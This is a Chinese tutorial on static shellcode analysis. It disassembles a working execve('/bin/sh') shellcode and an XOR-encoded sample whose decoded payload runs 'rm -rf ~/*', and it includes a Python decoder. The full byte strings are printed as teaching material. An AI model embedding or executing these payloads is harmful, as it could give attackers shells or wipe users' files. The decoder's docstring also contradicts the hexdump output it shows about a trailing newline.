下面，我們將分析幾個已有的shellcode的功能，通過分析，了解shellcode分析的技巧。整個過程只用靜態方法（ndisasm反匯編、腳本解碼、hexdump），不要直接執行樣本：例如第二個樣本解碼後的載荷會執行「rm -rf ~/*」刪除家目錄，分析這類樣本應在隔離的虛擬機中進行。
第一個shellcode代碼如下:
/*
 * Shellcode 1: 38 bytes (0x26), 32-bit Linux.  execve("/bin/sh", argv, NULL)
 * located via the jmp/call/pop trick.  The trailing 'X' (0x58) is overwritten
 * with a NUL byte at run time (mov [esi+7],al), so the raw bytes contain no
 * 0x00.  Because it writes into its own bytes, a test harness must place it
 * in memory that is both writable and executable (a const/.rodata buffer
 * would fault).  Never run samples like this outside an isolated VM.
 */
static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
"\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
"\x2f\x73\x68\x58";
使用ndisasm反匯編，結果如下（-u 表示按32位模式反匯編）:
- root@linux:~/pentest# echo -ne "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58" | ndisasm -u -
- 00000000 EB17 jmp short 0x19
- 00000002 5E pop esi
- 00000003 897608 mov [esi+0x8],esi
- 00000006 31C0 xor eax,eax
- 00000008 884607 mov [esi+0x7],al
- 0000000B 89460C mov [esi+0xc],eax
- 0000000E B00B mov al,0xb
- 00000010 89F3 mov ebx,esi
- 00000012 8D4E08 lea ecx,[esi+0x8]
- 00000015 31D2 xor edx,edx
- 00000017 CD80 int 0x80
- 00000019 E8E4FFFFFF call dword 0x2
- 0000001E 2F das
- 0000001F 62696E bound ebp,[ecx+0x6e]
- 00000022 2F das
- 00000023 7368 jnc 0x8d
- 00000025 58 pop eax
- root@linux:~/pentest#
可以看出，這是一個執行“/bin/sh”的shellcode。分析要點：0x00的`jmp 0x19`跳到0x19的`call 0x2`，call把返回地址0x1e壓棧，而0x1e正是“/bin/sh”字串的起始（2F 62 69 6E 2F 73 68），0x2的`pop esi`於是拿到了字串地址——這就是常見的jmp/call/pop定位技巧。隨後`mov [esi+7],al`（此時al=0）把字串末尾的“X”（0x58）改寫成NUL結尾，使原始字節中不含0x00；`mov [esi+8],esi`和`mov [esi+0xc],eax`在字串後面構造argv數組{“/bin/sh”, NULL}。最後eax=0xb（32位Linux的execve系統調用號），ebx=文件名（esi），ecx=argv（esi+8），edx=envp=NULL，`int 0x80`觸發系統調用。注意這段代碼會改寫自身字節，測試時必須放在可寫且可執行的內存中；如果execve失敗，執行會落回0x19的call再次循環。
第二個shellcode代碼如下:
/*
 * Shellcode 2: 98 bytes (0x62), 32-bit Linux.  Bytes 0x00-0x16 are a decoder
 * stub; bytes 0x17-0x61 (0x4b of them) are XOR-encoded and are decoded in
 * place (xor [esi],al / dec al / inc esi / loop), so the buffer must be
 * writable as well as executable.  The decoded payload is
 * execve("/bin/sh", {"sh", "-c", "rm -rf ~/* 2>/dev/null"}, NULL) followed
 * by exit() -- it deletes the home directory.  Decode it statically (see
 * decode.py); do NOT execute it.
 */
char shellcode2[] =
"\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"
"\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99"
"\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81"
"\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb"
"\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf"
"\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7"
"\x7b\x35";
下面使用ndisasm反匯編,結果如下:
- root@linux:~/pentest# echo -ne
- "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7\x7b\x35" | ndisasm -u -
- 00000000 EB10 jmp short 0x12
- 00000002 5E pop esi
- 00000003 31C9 xor ecx,ecx
- 00000005 B14B mov cl,0x4b
- 00000007 B0FF mov al,0xff
- 00000009 3006 xor [esi],al
- 0000000B FEC8 dec al
- 0000000D 46 inc esi
- 0000000E E2F9 loop 0x9
- 00000010 EB05 jmp short 0x17
- 00000012 E8EBFFFFFF call dword 0x2
- 00000017 17 pop ss
- 00000018 DB db 0xdb
- 00000019 FD std
- 0000001A FC cld
- 0000001B FB sti
- 0000001C D59B aad 0x9b
- 0000001E 91 xchg eax,ecx
- 0000001F 99 cdq
- 00000020 D9869CF38199 fld dword [esi-0x667e0c64]
- 00000026 F0C28DED lock ret 0xed8d
- 0000002A 9E sahf
- 0000002B 86CA xchg cl,dl
- 0000002D C49A81C69BCB les ebx,[edx-0x3464397f]
- 00000033 C9 leave
- 00000034 C2D3DE ret 0xded3
- 00000037 F0BAB8AAF4B4 lock mov edx,0xb4f4aab8
- 0000003D AC lodsb
- 0000003E B4BB mov ah,0xbb
- 00000040 D6 salc
- 00000041 88E5 mov ch,ah
- 00000043 13825C8DC19D adc eax,[edx-0x623e72a4]
- 00000049 40 inc eax
- 0000004A 91 xchg eax,ecx
- 0000004B C0994495CF954C rcr byte [ecx-0x6a306abc],0x4c
- 00000052 2F das
- 00000053 4A dec edx
- 00000054 23F0 and esi,eax
- 00000056 120F adc cl,[edi]
- 00000058 B570 mov ch,0x70
- 0000005A 3C32 cmp al,0x32
- 0000005C 7988 jns 0xffffffe6
- 0000005E 78F7 js 0x57
- 00000060 7B35 jpo 0x97
- root@linux:~/pentest#
從反匯編可以看出，0x00–0x16是一段解碼樁：`jmp 0x12`→`call 0x2`→`pop esi`同樣用jmp/call/pop拿到0x17處的地址；然後cl=0x4b（75字節，正好是0x17到結尾的長度），al=0xff，循環`xor [esi],al; dec al; inc esi; loop`把第i個字節與(0xff−i)異或，解碼完成後`jmp 0x17`跳入解碼後的載荷。這也解釋了為什麼上面從0x17開始的反匯編全是無意義的指令：那些字節還是密文。接下來，我們用一個python腳本靜態地重放這個異或循環（而不是執行shellcode），再用hexdump觀察解碼結果。
- root@linux:~/pentest# cat decode.py
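#!/usr/bin/env python3
"""Static decoder for shellcode2.

The first 0x17 bytes of shellcode2 are a decoder stub (jmp/call/pop to get
the payload address into esi, cl = 0x4b, al = 0xff, then
``xor [esi],al ; dec al ; inc esi ; loop``).  This script replays that XOR
loop on the bytes that follow the stub so the real payload can be inspected
with hexdump/ndisasm WITHOUT ever executing the sample.  Do not run the
sample itself: the decoded payload is
execve("/bin/sh", ["sh", "-c", "rm -rf ~/* 2>/dev/null"], NULL).

The original was Python 2 only (``print`` statement, str-based XOR) and no
longer runs under a modern ``python``.  Output is now the raw decoded bytes
on stdout with no trailing newline; the old ``print`` appended one, which
showed up as a stray 0x0a byte at the end of the hexdump/ndisasm output.
"""
import sys

# Encoded sample exactly as embedded in the C source (98 bytes).
sc = (
    b"\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"
    b"\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99"
    b"\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81"
    b"\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb"
    b"\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf"
    b"\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7"
    b"\x7b\x35"
)

# Offset of the encoded payload: the stub's ``call 0x2`` at 0x12 pushes 0x17.
PAYLOAD_OFFSET = 0x17
# Initial key, from ``mov al,0xff`` in the stub.
INITIAL_KEY = 0xff


def decode(blob, start=PAYLOAD_OFFSET, initial_key=INITIAL_KEY):
    """Replay the stub's rolling-XOR loop over ``blob[start:]``.

    Byte i of the payload is XORed with ``(initial_key - i) & 0xff``.  The
    ``& 0xff`` mirrors ``dec al`` wrapping in an 8-bit register, which the
    original ``0xff - i`` did not model (harmless for this sample: the
    payload is 0x4b bytes, so the key never wraps).

    Args:
        blob: the complete shellcode (bytes-like).
        start: offset of the first encoded byte (default 0x17).
        initial_key: value loaded into al before the loop (default 0xff).

    Returns:
        The decoded payload as ``bytes``; empty if ``start`` is past the end.
    """
    return bytes(b ^ ((initial_key - i) & 0xff)
                 for i, b in enumerate(bytes(blob[start:])))


if __name__ == "__main__":
    # Raw bytes, not text: stdout.buffer avoids encoding/newline mangling.
    sys.stdout.buffer.write(decode(sc))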
- root@linux:~/pentest# ./decode.py | hexdump -C
- 00000000 e8 25 00 00 00 2f 62 69 6e 2f 73 68 00 73 68 00 |.%.../bin/sh.sh.|
- 00000010 2d 63 00 72 6d 20 2d 72 66 20 7e 2f 2a 20 32 3e |-c.rm -rf ~/* 2>|
- 00000020 2f 64 65 76 2f 6e 75 6c 6c 00 5d 31 c0 50 8d 5d |/dev/null.]1.P.]|
- 00000030 0e 53 8d 5d 0b 53 8d 5d 08 53 89 eb 89 e1 31 d2 |.S.].S.].S....1.|
- 00000040 b0 0b cd 80 89 c3 31 c0 40 cd 80 0a |......1.@...|
- 0000004c
- root@linux:~/pentest#
可以看到“/bin/sh”“sh”“-c”“rm -rf ~/* 2>/dev/null”幾個字串（它們是execve的參數，不是指令）；末尾的0x0a不是shellcode的一部分，而是python的print附加的換行符。接下來我們使用ndisasm分析。注意開頭的`call 0x2a`會把字串區的地址（偏移5）壓棧，真正的代碼從0x2a開始：`pop ebp`取得字串區地址，依次push NULL、ebp+0xe（“rm -rf …”）、ebp+0xb（“-c”）、ebp+8（“sh”）在棧上構造argv，ebx=ebp（“/bin/sh”），ecx=esp，edx=0，eax=0xb調用execve，之後eax=1、ebx=返回值調用exit。ndisasm從0開始線性反匯編時會把0x05–0x29的字串當成指令並在0x29處錯位，導致0x2a的`pop ebp`、`xor eax,eax`、`push eax`、`lea ebx,[ebp+0xe]`在下面的列表中看不到，直到0x31才重新對齊；更可靠的做法是跳過字串區，例如`./decode.py | ndisasm -u -e 0x2a -o 0x2a -`:
- root@linux:~/pentest# ./decode.py | ndisasm -u -
- 00000000 E825000000 call dword 0x2a
- 00000005 2F das
- 00000006 62696E bound ebp,[ecx+0x6e]
- 00000009 2F das
- 0000000A 7368 jnc 0x74
- 0000000C 007368 add [ebx+0x68],dh
- 0000000F 002D6300726D add [dword 0x6d720063],ch
- 00000015 202D7266207E and [dword 0x7e206672],ch
- 0000001B 2F das
- 0000001C 2A20 sub ah,[eax]
- 0000001E 323E xor bh,[esi]
- 00000020 2F das
- 00000021 6465762F gs jna 0x54
- 00000025 6E outsb
- 00000026 756C jnz 0x94
- 00000028 6C insb
- 00000029 005D31 add [ebp+0x31],bl
- 0000002C C0508D5D rcl byte [eax-0x73],0x5d
- 00000030 0E push cs
- 00000031 53 push ebx
- 00000032 8D5D0B lea ebx,[ebp+0xb]
- 00000035 53 push ebx
- 00000036 8D5D08 lea ebx,[ebp+0x8]
- 00000039 53 push ebx
- 0000003A 89EB mov ebx,ebp
- 0000003C 89E1 mov ecx,esp
- 0000003E 31D2 xor edx,edx
- 00000040 B00B mov al,0xb
- 00000042 CD80 int 0x80
- 00000044 89C3 mov ebx,eax
- 00000046 31C0 xor eax,eax
- 00000048 40 inc eax
- 00000049 CD80 int 0x80
- 0000004B 0A db 0x0a
- root@linux:~/pentest#